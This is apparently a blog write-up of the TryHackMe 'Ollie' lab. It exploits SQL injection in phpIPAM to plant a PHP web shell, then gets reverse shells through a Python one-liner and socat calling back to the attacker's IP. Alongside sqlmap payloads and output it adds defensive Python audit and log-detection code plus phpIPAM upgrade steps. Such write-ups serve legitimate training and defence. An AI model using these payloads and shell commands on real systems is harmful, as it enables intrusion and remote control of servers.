Month: July 2022
Ollie – Write Up
Recon
Hey! Welcome back to another TryHackMe machine!
Today we are pwning another 0day machine!
As in every machine, we start with the recon phase!
gobuster turned up a /db directory, but it led nowhere.
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -b 404 -u http://10.10.79.229
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.79.229
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2022/07/08 09:39:09 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.79.229/.hta (Status: 403) [Size: 277]
http://10.10.79.229/.htaccess (Status: 403) [Size: 277]
http://10.10.79.229/.htpasswd (Status: 403) [Size: 277]
http://10.10.79.229/api (Status: 301) [Size: 310] [--> http://10.10.79.229/api/]
http://10.10.79.229/app (Status: 301) [Size: 310] [--> http://10.10.79.229/app/]
http://10.10.79.229/css (Status: 301) [--> http://10.10.79.229/css/]
http://10.10.79.229/db (Status: 301) [Size: 309] [--> http://10.10.79.229/db/]
There’s a strange service running on port 1337 (leet :D). It’s a common port in CTFs and among pentesters because it references leet speak.
Let’s use nc to connect to this port…
Let’s log in!
Foothold – User
So after a (long) reconnaissance phase, we found that the platform running is phpIPAM IP address management [v1.4.5].
The issue here is that there is an exploit for the older version (1.4.4) of this software, which claims that the issue was fixed in the latest version…
Well…
Spoiler: it seems it’s not.
Here is the exploit PoC we used as a guide: https://fluidattacks.com/advisories/mercury/
Basically, we need to run a search when mapping a new subnet to exploit an SQL injection.
This is the exploit used to test if it is vulnerable or not:
" union select @@version,2,user(),4 -- -
or
" union select user(),1,1,load_file('/etc/passwd') --
We used it here and got this output:
As you can see, we can exploit an SQLi here, and we have the version and the user running the DB:
8.0.28-0ubuntu0.20.04.3/phpipam_ollie@localhost (4)
Cool! Let’s do more manual reconnaissance within the database. Let’s see if our user phpipam_ollie is able to write a file!
Exploit used: " union all select 1,2,3,group_concat(user,0x3a,file_priv) from mysql.user -- -
ollie_mysql:Y,phpipam_ollie:Y
Yes! The user is able to write files!!
So to exploit this, we encoded a simple PHP payload to HEX:
https://www.online-toolz.com/tools/text-hex-convertor.php
<?php system($_GET["cmd"]); ?>
And added it to our exploit:
" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/shell.php' -- -
We got an error, but let’s see if it was uploaded…
Let’s establish a reverse shell connection, and start the recon phase again to get root!
Let’s try the easiest way to escalate privileges: a password reuse attack!
It worked! Ollie uses the same password for the server and the administration panel!
Root
To make our way to root, we need to enumerate the machine once again. We used LinPEAS, but nothing caught our attention, so we ran pspy instead:
timeout 60s ./pspy64
Let’s see what’s up with it…
Shell upgrade to a full TTY first:
python3 -c 'import pty;pty.spawn("bash")'
CTRL-Z
stty raw -echo; fg
reset (answer "screen" at the "Terminal type?" prompt)
export TERM=xterm-256color
It seems like a binary owned by root, but with the group ollie, and we have read and write permissions!
Let’s add an exploit to it, so we can have a reverse shell connection as root!
Let’s set up the listener and wait for the connection!
That’s all
Beyond ROOT
Why we were able to write files (a non-default MySQL setting)
root@hackerdog:/etc/mysql/mysql.conf.d# cat mysqld.cnf
#
# The MySQL database server configuration file.
--snip--
# http://dev.mysql.com/doc/mysql/en/server-system-variables.html
# Here is entries for some specific programs
# The following values assume you have at least 32M ram
[mysqld]
#
# * Basic Settings
#
user = mysql
# pid-file = /var/run/mysqld/mysqld.pid
# socket = /var/run/mysqld/mysqld.sock
# port = 3306
# datadir = /var/lib/mysql
secure_file_priv="/"
--snip--
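The setting above is what made the INTO OUTFILE write possible. As an added check, not part of the original write-up, the following Python audits a mysqld.cnf text for the secure_file_priv value and lists accounts holding the FILE privilege, in the user:file_priv format the write-up’s query returned; the config text and account list are constructed samples.

```python
"""Audit the MySQL settings the write-up abused: secure_file_priv="/" (so
SELECT ... INTO OUTFILE can write anywhere the mysql OS user can) plus an
application account holding the FILE privilege. Samples are constructed."""
import re

SAMPLE_CNF = """\
[mysqld]
user = mysql
# secure_file_priv = /var/lib/mysql-files
secure_file_priv="/"
"""
# Same shape as the write-up's group_concat(user,0x3a,file_priv) output.
# In a real audit run: SELECT user, host FROM mysql.user WHERE File_priv='Y';
SAMPLE_FILE_PRIV = "ollie_mysql:Y,phpipam_ollie:Y,root:Y,readonly:N"

def secure_file_priv_status(cnf_text):
    """Classify secure_file_priv: 'disabled' (NULL), 'restricted:<dir>',
    'unrestricted' (empty, or "/" which confines writes to the whole
    filesystem and so restricts nothing), or 'unset' (build default).
    Comment lines are skipped; the last active assignment wins."""
    value = None
    for line in cnf_text.splitlines():
        m = re.match(r'^\s*secure[_-]file[_-]priv\s*=\s*(.*?)\s*$', line)
        if m:
            value = m.group(1).strip('"\'')
    if value is None:
        return "unset"
    if value.upper() == "NULL":
        return "disabled"
    path = value.rstrip("/")
    return "unrestricted" if path == "" else "restricted:" + path

def file_priv_accounts(user_csv):
    """Accounts whose File_priv is 'Y' in 'user:priv,user:priv' text."""
    pairs = (item.partition(":") for item in user_csv.split(","))
    return [user for user, _, priv in pairs if priv.strip() == "Y"]

def audit(cnf_text, user_csv):
    """One finding per problem; an empty list means this write path is closed."""
    findings = []
    status = secure_file_priv_status(cnf_text)
    if status == "unrestricted":
        findings.append("secure_file_priv allows OUTFILE outside a dedicated directory")
    elif status == "unset":
        findings.append("secure_file_priv not in config; check SHOW VARIABLES LIKE 'secure_file_priv'")
    for acct in file_priv_accounts(user_csv):
        if acct != "root":  # root aside, no account (least of all the web app's) needs FILE
            findings.append("account %s holds FILE privilege" % acct)
    return findings
```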
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $ssh root@10.10.115.200
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-99-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 07 Jul 2022 12:53:52 PM UTC
System load: 0.0 Processes: 151
Usage of /: 64.2% of 9.78GB Users logged in: 0
Memory usage: 37% IPv4 address for docker0: 172.17.0.1
Swap usage: 0% IPv4 address for eth0: 10.10.115.200
6 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sat Feb 12 15:49:15 2022
root@hackerdog:~# docker image list
REPOSITORY TAG IMAGE ID CREATED SIZE
olliebot latest 3bb28301dbba 4 months ago 48.4MB
root@hackerdog:~# crontab -l
no crontab for root
root@hackerdog:~# crontab -l -u ollie
no crontab for ollie
root@hackerdog:~#
Other ways:
https://www.exploit-db.com/exploits/50963
┌─[✗]─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $python3 50963.py -url http://10.10.79.250 -usr admin -pwd O[redacted]y! -cmd id
[...] Trying to log in as admin
[+] Login successful!
[...] Exploiting
[+] Success! The shell is located at http://10.10.79.250/evil.php. Parameter: cmd
[+] Output:
1 uid=33(www-data) gid=33(www-data) groups=33(www-data)
3 4
┌─[puck@parrot-lt]─[~/thm/ollie]
sqlmap
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $cat request.txt
POST /app/admin/routing/edit-bgp-mapping-search.php HTTP/1.1
Host: 10.10.79.229
Content-Length: 68
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.10.79.229
Referer: http://10.10.79.229/index.php?page=administration&section=routing&subnetId=bgp&sPage=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpipam=oqrblblmjlutf187oee7dh63q8; table-page-size=50
Connection: close
subnet=test&bgp_id=2
┌─[puck@parrot-lt]─[~/thm/ollie]
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $sqlmap -r request.txt --file-write=rev.php --file-dest=/var/www/html/rev.php --batch
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:29:48 /2022-07-08/
[08:29:48] [INFO] parsing HTTP request from 'request.txt'
[08:29:48] [INFO] testing connection to the target URL
[08:29:48] [INFO] testing if the target URL content is stable
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[08:29:48] [INFO] target URL content is stable
[08:29:48] [INFO] testing if POST parameter 'subnet' is dynamic
[08:29:48] [WARNING] POST parameter 'subnet' does not appear to be dynamic
[08:29:48] [INFO] heuristic (basic) test shows that POST parameter 'subnet' might be injectable (possible DBMS: 'MySQL')
[08:29:49] [INFO] testing for SQL injection on POST parameter 'subnet'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[08:29:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:29:49] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[08:29:49] [INFO] testing 'Generic inline queries'
[08:29:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[08:29:50] [WARNING] reflective value(s) found and filtering out
[08:29:51] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[08:29:52] [INFO] POST parameter 'subnet' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --string="10.10.0.0/16 (Business customers)")
[08:29:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[08:29:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:29:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[08:29:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[08:29:52] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[08:29:52] [INFO] POST parameter 'subnet' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable
[08:29:52] [INFO] testing 'MySQL inline queries'
[08:29:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[08:30:02] [INFO] POST parameter 'subnet' appears to be 'MySQL >= 5.0.12 stacked queries (comment)' injectable
[08:30:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:30:12] [INFO] POST parameter 'subnet' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[08:30:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:30:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[08:30:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:30:12] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[08:30:13] [INFO] target URL appears to have 4 columns in query
[08:30:13] [INFO] POST parameter 'subnet' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[08:30:13] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'subnet' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 87 HTTP(s) requests:
---
Parameter: subnet (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: subnet=-9472" OR 7217=7217#&bgp_id=2
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: subnet=test" AND GTID_SUBSET(CONCAT(0x7171627671,(SELECT (ELT(8609=8609,1))),0x717a6a7171),8609)-- Nngn&bgp_id=2
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: subnet=test";SELECT SLEEP(5)#&bgp_id=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: subnet=test" AND (SELECT 8032 FROM (SELECT(SLEEP(5)))UEUE)-- bIqT&bgp_id=2
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: subnet=test" UNION ALL SELECT NULL,NULL,CONCAT(0x7171627671,0x65704e6267576745697a41717a445a68676d5a6c6b75754f5944637376545a6f6175457155686d74,0x717a6a7171),NULL#&bgp_id=2
---
[08:30:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.6
[08:30:13] [INFO] fingerprinting the back-end DBMS operating system
[08:30:13] [INFO] the back-end DBMS operating system is Linux
[08:30:14] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want confirmation that the local file 'rev.php' has been successfully written on the back-end DBMS file system ('/var/www/html/rev.php')? [Y/n] Y
[08:30:14] [INFO] the local file 'rev.php' and the remote file '/var/www/html/rev.php' have the same size (32 B)
[08:30:14] [INFO] fetched data logged to text files under '/home/puck/.local/share/sqlmap/output/10.10.79.229'
[*] ending @ 08:30:14 /2022-07-08/
┌─[puck@parrot-lt]─[~/thm/ollie]
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $curl http://10.10.79.229/rev.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $
direct shell from browser
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.1.91",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
┌─[puck@parrot-lt]─[~/thm]
└──╼ $nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.9.1.91] from (UNKNOWN) [10.10.79.229] 47654
/bin/sh: 0: can't access tty; job control turned off
$ hostname
hackerdog
$
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $curl http://10.10.79.229/rev.php?cmd=socat%20exec:%27bash%20-li%27,pty,stderr,setsid,sigint,sane%20tcp:10.9.1.91:4242
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $socat file:`tty`,raw,echo=0 TCP-L:4242
www-data@hackerdog:/var/www/html$
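Those rev.php requests are exactly what a defender would see in the Apache access log. As an added example, not code from the write-up, this Python scans access-log lines for PHP files requested outside phpIPAM’s known entry points and for shell-like arguments; the log lines are constructed from the requests above, and the entry-point list is an assumption to be built from the real deployed tree.

```python
"""Spot web-shell use in Apache access logs: a PHP file requested outside the
application's known entry points, optionally with a shell-like argument, as
with rev.php?cmd=... above. Log lines are constructed, not real logs."""
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: phpIPAM's legitimate top-level entry points on this deployment.
# Build this list from the deployed tree, not from memory, before relying on it.
KNOWN_PREFIXES = ("/index.php", "/app/", "/api/", "/install/", "/upgrade/")

# Words and metacharacters that belong in a shell command, not an IPAM query string.
SHELL_TOKENS = re.compile(
    r"(?:^|[\s;|&`(])(?:sh|bash|socat|nc|python3?|perl|curl|wget)\b|[;|&`]")

# Combined Log Format up to the status code; the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

SAMPLE_LOG = """\
10.9.1.91 - - [08/Jul/2022:08:31:02 +0000] "GET /index.php?page=tools HTTP/1.1" 200 5123
10.9.1.91 - - [08/Jul/2022:08:31:10 +0000] "POST /app/admin/routing/edit-bgp-mapping-search.php HTTP/1.1" 200 642
10.9.1.91 - - [08/Jul/2022:08:31:20 +0000] "GET /rev.php?cmd=id HTTP/1.1" 200 54
10.9.1.91 - - [08/Jul/2022:08:31:40 +0000] "GET /rev.php?cmd=socat%20exec:%27bash%20-li%27,pty,stderr,setsid,sigint,sane%20tcp:10.9.1.91:4242 HTTP/1.1" 200 0
10.9.1.91 - - [08/Jul/2022:08:32:00 +0000] "GET /css/style.css HTTP/1.1" 200 8000
"""

def suspicious_requests(log_text):
    """Return (client_ip, path, reason) for each request worth triaging."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith(".php") or url.path.startswith(KNOWN_PREFIXES):
            continue  # static asset, or a file the application legitimately serves
        reason = "php file outside known entry points"
        for name, values in parse_qs(url.query).items():  # parse_qs URL-decodes
            if any(SHELL_TOKENS.search(v) for v in values):
                reason = "shell-like argument in %s=" % name
        hits.append((m["ip"], url.path, reason))
    return hits
```

A complementary host-side check is any PHP file in the web root owned by the mysql OS user, since a file created by INTO OUTFILE is written by mysqld itself.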
Upgrading phpipam
In general upgrading phpipam is a process that contains 3 separate steps:
- Backup database and config.php file
- Upgrade phpIPAM code
- Upgrade phpIPAM database
1.) Create backup
The database part is separate from the code, so if you have a backup SQL file from the old installation you can always restore it if anything goes wrong in the process. Before you upgrade, make sure you back up your SQL database with the following steps (adjust directories etc. according to your installation):
[root@ipam /]# cd /var/www/html/phpipam/
[root@ipam /var/www/phpipam]# mysqldump -u root -p phpipam > phpipam_migration_backup.db
* if you want to restore
root@ipam:/opt# mysql -u root -p phpipam < phpipam_migration_backup.db
Enter password:
root@ipam:/opt#
Also backup config.php file containing settings for database connection to phpipam.
2.) Upgrade phpIPAM code
Simply extract new code and copy over old config.php file.
[root@ipam /]# cd /var/www/html
[root@ipam /var/www/html]# tar -tvf phpipam-v1.4.7.tgz
[root@ipam /var/www/html]# tar -xvf phpipam-v1.4.7.tgz
[root@ipam /var/www/html]# cp /backup/location/config.php /var/www
In case you use Git, the upgrade is even easier:
[root@ipam /]# cd /var/www/phpipam
[root@ipam /var/www/phpipam]# git pull
[root@ipam /var/www/phpipam]# git checkout -b 1.5 origin/1.5
[root@ipam /var/www/phpipam]# git submodule update --init --recursive
3.) Upgrade phpIPAM database
To upgrade your phpIPAM database to the latest version, 3 options are possible; they are presented on the upgrade screen in the browser:
a) Automatic database upgrade
Open browser and follow upgrade procedure.
b) Manual query import
In case you have problems, you can manually import each SQL update statement directly into the MySQL database. All upgrade queries are available in the db/UPDATE.sql file; start from the statement for the first version higher than the one you are currently using.
Restore old installation and database
In case anything goes wrong the restore procedure is simple:
- Extract old code (from version you have prior to upgrade)
- Copy over config.php
- Load the old database you backed up before starting the upgrade (mysql -u root -p < db/bkp/phpipam_migration_backup.db)